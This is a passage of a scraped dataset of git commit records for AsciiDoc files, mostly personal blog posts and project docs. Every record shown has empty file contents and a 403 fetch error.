2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c8a5bc5561cb4f9c96748d6b66473f85de54bfe","subject":"Publish 2016-6-27-file-getput-contents.adoc","message":"Publish 2016-6-27-file-getput-contents.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-file-getput-contents.adoc","new_file":"2016-6-27-file-getput-contents.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43b79bca26c27265b40e5c00e4625118c250c327","subject":"Forget the intercept.adoc file","message":"Forget the intercept.adoc file\n","repos":"adessaigne\/camel,JYBESSON\/camel,sabre1041\/camel,adessaigne\/camel,oalles\/camel,YoshikiHigo\/camel,nboukhed\/camel,tdiesler\/camel,pkletsko\/camel,allancth\/camel,cunningt\/camel,tlehoux\/camel,Fabryprog\/camel,sverkera\/camel,mgyongyosi\/camel,anoordover\/camel,ssharma\/camel,tkopczynski\/camel,punkhorn\/camel-upstream,christophd\/camel,bhaveshdt\/camel,sabre1041\/camel,jkorab\/camel,anton-k11\/camel,kevinearls\/camel,RohanHart\/camel,bhaveshdt\/camel,oalles\/camel,curso007\/camel,oalles\/camel,mgyongyosi\/camel,tkopczynski\/camel,onders86\/camel,jamesnetherton\/camel,christophd\/camel,tlehoux\/camel,chirino\/camel,driseley\/camel,drsquidop\/camel,yuruki\/camel,NickCis\/camel,DariusX\/camel,ullgren\/camel,nikhilvibhav\/camel,chirino\/camel,yuruki\/camel,apache\/camel,sirlatrom\/camel,tlehoux\/camel,apache\/camel,jmandawg\/camel,lburgazzoli\/camel,gnodet\/camel,sabre1041\/camel,rmarting\/camel,tadayosi\/camel,nboukhed\/camel,adessaigne\/camel,gnodet\/camel,pkletsko\/camel,alvinkwekel\/camel,snurmine\/camel,jlpedrosa\/camel,sirlatrom\/camel,YoshikiHigo\/camel,veithen\/camel,rmarting\/camel,jonmcewen\/camel,borcsokj\/camel,allancth\/camel,RohanHart\/camel,CodeSmell\/camel,alvinkwekel\/camel,bgaudaen\/camel,apache\/camel,sirlatrom\/camel,JYBESSON\/camel,apache\/camel,ssharma\/camel,bhaveshdt\/camel,borcsokj\/camel,onders86\/camel,pkletsko\/camel,scranton\/camel,gautric\/camel,curso007\/camel,onders86\/camel,cunningt\/camel,tlehoux\/camel,chirino\/camel,salikjan\/camel,allancth\/camel,mgyongyosi\/camel,veithen\/camel,jarst\/camel,kevinearls\/camel,alvinkwekel\/camel,sirlatrom\/camel,jmandawg\/camel,jamesnetherton\/camel,prashant2402\/camel,neoramon\/camel,prashant2402\/camel,pax95\/camel,anoordover\/camel,driseley\/camel,tadayosi\/camel,pkletsko\/camel,acartapanis\/camel,scranton\/camel,neoramon\/camel,ssharma\/camel,rmarting\/camel,sverkera\/camel,nikvaessen\/camel,ullgren\/camel,pax95\/camel,bgaudaen\/camel,nicolaferraro\/camel,hqstevenson\/camel,Thopap\/camel,sabre1041\/camel,anoordover\/camel,anoordover\/camel,sverkera\/camel,neoramon\/camel,mcollovati\/camel,neoramon\/camel,drsquidop\/camel,cunningt\/camel,bgaudaen\/camel,gilfernandes\/camel,alvinkwekel\/camel,gautric\/camel,curso007\/camel,jarst\/camel,nboukhed\/camel,jkorab\/camel,jonmcewen\/camel,mcollovati\/camel,mgyongyosi\/camel,pkletsko\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,jarst\/camel,lburgazzoli\/apache-camel,nikvaessen\/camel,pmoerenhout\/camel,kevinearls\/camel,scranton\/camel,adessaigne\/camel,yuruki\/camel,isavin\/camel,lburgazzoli\/camel,ssharma\/camel,nboukhed\/camel,bgaudaen\/camel,davidkarlsen\/camel,pmoerenhout\/came
l,tdiesler\/camel,hqstevenson\/camel,hqstevenson\/camel,jlpedrosa\/camel,gnodet\/camel,bhaveshdt\/camel,acartapanis\/camel,lburgazzoli\/apache-camel,pax95\/camel,rmarting\/camel,anton-k11\/camel,jkorab\/camel,driseley\/camel,jmandawg\/camel,christophd\/camel,JYBESSON\/camel,veithen\/camel,drsquidop\/camel,FingolfinTEK\/camel,jlpedrosa\/camel,mcollovati\/camel,w4tson\/camel,YoshikiHigo\/camel,rmarting\/camel,adessaigne\/camel,jkorab\/camel,sabre1041\/camel,ssharma\/camel,kevinearls\/camel,bgaudaen\/camel,anoordover\/camel,acartapanis\/camel,onders86\/camel,prashant2402\/camel,jonmcewen\/camel,gilfernandes\/camel,objectiser\/camel,RohanHart\/camel,gautric\/camel,zregvart\/camel,hqstevenson\/camel,akhettar\/camel,acartapanis\/camel,oalles\/camel,pmoerenhout\/camel,tkopczynski\/camel,anton-k11\/camel,tdiesler\/camel,jamesnetherton\/camel,anoordover\/camel,apache\/camel,lburgazzoli\/apache-camel,chirino\/camel,akhettar\/camel,sirlatrom\/camel,JYBESSON\/camel,ullgren\/camel,drsquidop\/camel,NickCis\/camel,YoshikiHigo\/camel,nikvaessen\/camel,RohanHart\/camel,jkorab\/camel,nikhilvibhav\/camel,jmandawg\/camel,akhettar\/camel,pax95\/camel,jkorab\/camel,DariusX\/camel,jlpedrosa\/camel,sabre1041\/camel,yuruki\/camel,dmvolod\/camel,scranton\/camel,ullgren\/camel,dmvolod\/camel,cunningt\/camel,allancth\/camel,borcsokj\/camel,nikhilvibhav\/camel,driseley\/camel,oalles\/camel,bhaveshdt\/camel,onders86\/camel,christophd\/camel,davidkarlsen\/camel,neoramon\/camel,neoramon\/camel,Thopap\/camel,pax95\/camel,tdiesler\/camel,nboukhed\/camel,NickCis\/camel,prashant2402\/camel,veithen\/camel,isavin\/camel,NickCis\/camel,Thopap\/camel,snurmine\/camel,zregvart\/camel,nicolaferraro\/camel,dmvolod\/camel,sverkera\/camel,punkhorn\/camel-upstream,dmvolod\/camel,pax95\/camel,driseley\/camel,borcsokj\/camel,Fabryprog\/camel,chirino\/camel,lburgazzoli\/apache-camel,gilfernandes\/camel,jonmcewen\/camel,cunningt\/camel,tdiesler\/camel,prashant2402\/camel,Thopap\/camel,isavin\/camel,NickCis\/camel,isavin\/camel,apache\/camel,jmandawg\/camel,DariusX\/camel,davidkarlsen\/camel,FingolfinTEK\/camel,nikvaessen\/camel,tkopczynski\/camel,prashant2402\/camel,gilfernandes\/camel,objectiser\/camel,snurmine\/camel,isavin\/camel,dmvolod\/camel,jarst\/camel,punkhorn\/camel-upstream,bhaveshdt\/camel,allancth\/camel,jonmcewen\/camel,nicolaferraro\/camel,yuruki\/camel,cunningt\/camel,tadayosi\/camel,hqstevenson\/camel,anton-k11\/camel,isavin\/camel,jamesnetherton\/camel,FingolfinTEK\/camel,tlehoux\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,salikjan\/camel,drsquidop\/camel,w4tson\/camel,nboukhed\/camel,jarst\/camel,lburgazzoli\/apache-camel,gautric\/camel,allancth\/camel,tkopczynski\/camel,objectiser\/camel,akhettar\/camel,CodeSmell\/camel,RohanHart\/camel,pmoerenhout\/camel,tlehoux\/camel,tadayosi\/camel,acartapanis\/camel,scranton\/camel,gautric\/camel,gautric\/camel,zregvart\/camel,acartapanis\/camel,curso007\/camel,zregvart\/camel,mgyongyosi\/camel,snurmine\/camel,JYBESSON\/camel,lburgazzoli\/apache-camel,FingolfinTEK\/camel,curso007\/camel,YoshikiHigo\/camel,w4tson\/camel,rmarting\/camel,curso007\/camel,christophd\/camel,jarst\/camel,kevinearls\/camel,lburgazzoli\/camel,veithen\/camel,kevinearls\/camel,pmoerenhout\/camel,davidkarlsen\/camel,nicolaferraro\/camel,snurmine\/camel,akhettar\/camel,veithen\/camel,adessaigne\/camel,gnodet\/camel,nikvaessen\/camel,dmvolod\/camel,JYBESSON\/camel,w4tson\/camel,mgyongyosi\/camel,tadayosi\/camel,sirlatrom\/camel,sverkera\/camel,DariusX\/camel,Fabryprog\/camel,oalles\/camel,driseley\/camel,b
orcsokj\/camel,tkopczynski\/camel,lburgazzoli\/camel,lburgazzoli\/camel,jlpedrosa\/camel,objectiser\/camel,chirino\/camel,jonmcewen\/camel,bgaudaen\/camel,NickCis\/camel,RohanHart\/camel,jlpedrosa\/camel,gnodet\/camel,akhettar\/camel,tdiesler\/camel,nikvaessen\/camel,pkletsko\/camel,Thopap\/camel,FingolfinTEK\/camel,CodeSmell\/camel,yuruki\/camel,snurmine\/camel,jmandawg\/camel,sverkera\/camel,ssharma\/camel,borcsokj\/camel,anton-k11\/camel,FingolfinTEK\/camel,Thopap\/camel,w4tson\/camel,Fabryprog\/camel,hqstevenson\/camel,jamesnetherton\/camel,mcollovati\/camel,lburgazzoli\/camel,scranton\/camel,CodeSmell\/camel,gilfernandes\/camel,drsquidop\/camel,w4tson\/camel,YoshikiHigo\/camel,tadayosi\/camel,onders86\/camel,gilfernandes\/camel,anton-k11\/camel,christophd\/camel","old_file":"docs\/user-manual\/en\/intercept.adoc","new_file":"docs\/user-manual\/en\/intercept.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22f3f8de6bb40a1eaf6527976b1a2b4127eeb80e","subject":"LIVEOAK-246: intial creation of UPS docs. Still a work in progress.","message":"LIVEOAK-246: intial creation of UPS docs. Still a work in progress.\n","repos":"liveoak-io\/liveoak.io,liveoak-io\/liveoak.io,liveoak-io\/liveoak.io","old_file":"docs\/ups.adoc","new_file":"docs\/ups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liveoak-io\/liveoak.io.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"38bbfcea3ae99f39920b70d20f32e7b98cccc7f6","subject":"Update 2019-01-13-Golang.adoc","message":"Update 2019-01-13-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-13-Golang.adoc","new_file":"_posts\/2019-01-13-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bd425eab483ffb01ef4a7f144e12586c77a2581","subject":"Update 2018-05-21-My-post.adoc","message":"Update 2018-05-21-My-post.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2018-05-21-My-post.adoc","new_file":"_posts\/2018-05-21-My-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3fa39fcdc12ca23508c8b8556c384064b9dd3c","subject":"Update 2016-08-09-xiaocase2.adoc","message":"Update 2016-08-09-xiaocase2.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-xiaocase2.adoc","new_file":"_posts\/2016-08-09-xiaocase2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6438e6f50a250be415ca61c9853960ff6731014b","subject":"Create README.asciidoc","message":"Create 
README.asciidoc","repos":"ProgrammingRobotsStudyGroup\/RoboHead,ProgrammingRobotsStudyGroup\/RoboHead","old_file":"html\/README.asciidoc","new_file":"html\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ProgrammingRobotsStudyGroup\/RoboHead.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e2e69547976f6a59013f690c36a2501ed384edc","subject":"Formatting","message":"Formatting\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Null.adoc","new_file":"Best practices\/Null.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4d6f539cef347bf1f9b7dcf4873d44d270b311d","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a9eb5b72e361bc6c1b0bf56c4e7251c9cc7935b","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48f4fd8bae6e7b418ce8a61132b7104e93ccae48","subject":"Update 2017-04-20-Week-4-Simple-walk-animation-UI-updates-and-Damage-taken.adoc","message":"Update 2017-04-20-Week-4-Simple-walk-animation-UI-updates-and-Damage-taken.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-04-20-Week-4-Simple-walk-animation-UI-updates-and-Damage-taken.adoc","new_file":"_posts\/2017-04-20-Week-4-Simple-walk-animation-UI-updates-and-Damage-taken.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35ebe76cf45db9d04729aa215b1ea124feae21ca","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5d62e0b2a0c4052188f630cb51701ee63fcad9d","subject":"Update 2015-02-10-On-how-to-choose-a-stack.adoc","message":"Update 2015-02-10-On-how-to-choose-a-stack.adoc","repos":"vanpelt\/vanpelt.github.io,vanpelt\/vanpelt.github.io,vanpelt\/vanpelt.github.io","old_file":"_posts\/2015-02-10-On-how-to-choose-a-stack.adoc","new_file":"_posts\/2015-02-10-On-how-to-choose-a-stack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vanpelt\/vanpelt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb6ba3afe21593fdc39b59a4bba16650887d7127","subject":"Update 2015-07-15-Development-status-v0102.adoc","message":"Update 2015-07-15-Development-status-v0102.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2015-07-15-Development-status-v0102.adoc","new_file":"_posts\/2015-07-15-Development-status-v0102.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c673260827b6bbdacdbad99369a03c95250bb3bb","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"755f57759341e1875f97757783917a272e246dd6","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b23a861b167e7b77ed8fafa32478047a72db0bd2","subject":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","message":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea675fe03d5b5f64a5440d320a2ef286c1377791","subject":"y2b create post Corsair AX1200i Unboxing (Gaming PC Power Supply - 
UGPC 2012)","message":"y2b create post Corsair AX1200i Unboxing (Gaming PC Power Supply - UGPC 2012)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-08-13-Corsair-AX1200i-Unboxing-Gaming-PC-Power-Supply--UGPC-2012.adoc","new_file":"_posts\/2012-08-13-Corsair-AX1200i-Unboxing-Gaming-PC-Power-Supply--UGPC-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc4e457a1ea0680bf1ba29f3f5ccd281b499ab83","subject":"Update 2016-03-04-New-System.adoc","message":"Update 2016-03-04-New-System.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92a774d75baf7c08822dcc47618aab57c1ae75ee","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6023344df89dd0f0212560635dcf35b790e604f1","subject":"Publish 2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","message":"Publish 2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","new_file":"2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5064fd480713916c8130f2fd8129954e309c119","subject":"Update 2015-08-03-Hello-World-20.adoc","message":"Update 2015-08-03-Hello-World-20.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2015-08-03-Hello-World-20.adoc","new_file":"_posts\/2015-08-03-Hello-World-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb6624e7f404451829052512a24162195ac9fb19","subject":"Update 2016-09-06-TWCTF-Writeups.adoc","message":"Update 
2016-09-06-TWCTF-Writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2969f2d7b1ffcb8144953a1df0e60d973dd92e37","subject":"updated readme with requirements that should be sent out by email","message":"updated readme with requirements that should be sent out by email\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"622d921e558e2e74e45e083d57ece5fdd0a86c7b","subject":"job #11555 drafted ant","message":"job #11555 drafted ant\n","repos":"travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,perojonsson\/bridgepoint,lwriemen\/bridgepoint,perojonsson\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,perojonsson\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,perojonsson\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,perojonsson\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,perojonsson\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11555_marking\/11555_marking_ant.adoc","new_file":"doc-bridgepoint\/notes\/11555_marking\/11555_marking_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3a033d829cd6aab17995b68371e7e136c47cc9b8","subject":"[docs] Add tip on dealing with planned TS downtime","message":"[docs] Add tip on dealing with planned TS downtime\n\nRendering available at\nhttps:\/\/github.com\/wdberkeley\/kudu\/blob\/docfollowerunavailablesec\/docs\/administration.adoc.\n\nChange-Id: I55a992a00f35945187e02c55594edc6e261a72c4\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11486\nReviewed-by: Andrew Wong 
<b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a27238ac419836db924b3c59af1d72ed42aa0b33","subject":"Update 2014-03-26-Presentation-de-Sails-chez-Sup-Info-Paris.adoc","message":"Update 2014-03-26-Presentation-de-Sails-chez-Sup-Info-Paris.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2014-03-26-Presentation-de-Sails-chez-Sup-Info-Paris.adoc","new_file":"_posts\/2014-03-26-Presentation-de-Sails-chez-Sup-Info-Paris.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"217608c8cb07a835818fbe07f4f27902cde32d4f","subject":"y2b create post The Black Friday Deals They Won't Show You...","message":"y2b create post The Black Friday Deals They Won't Show You...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-23-The-Black-Friday-Deals-They-Wont-Show-You.adoc","new_file":"_posts\/2017-11-23-The-Black-Friday-Deals-They-Wont-Show-You.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fee0ec15384f8301866d45788c31a058116df04","subject":"[docs] Contributing to blog","message":"[docs] Contributing to blog\n\nSubmitting blog posts are not straightforward, especially if someone\nhasn't used Jekyll and\/or Gerrit. 
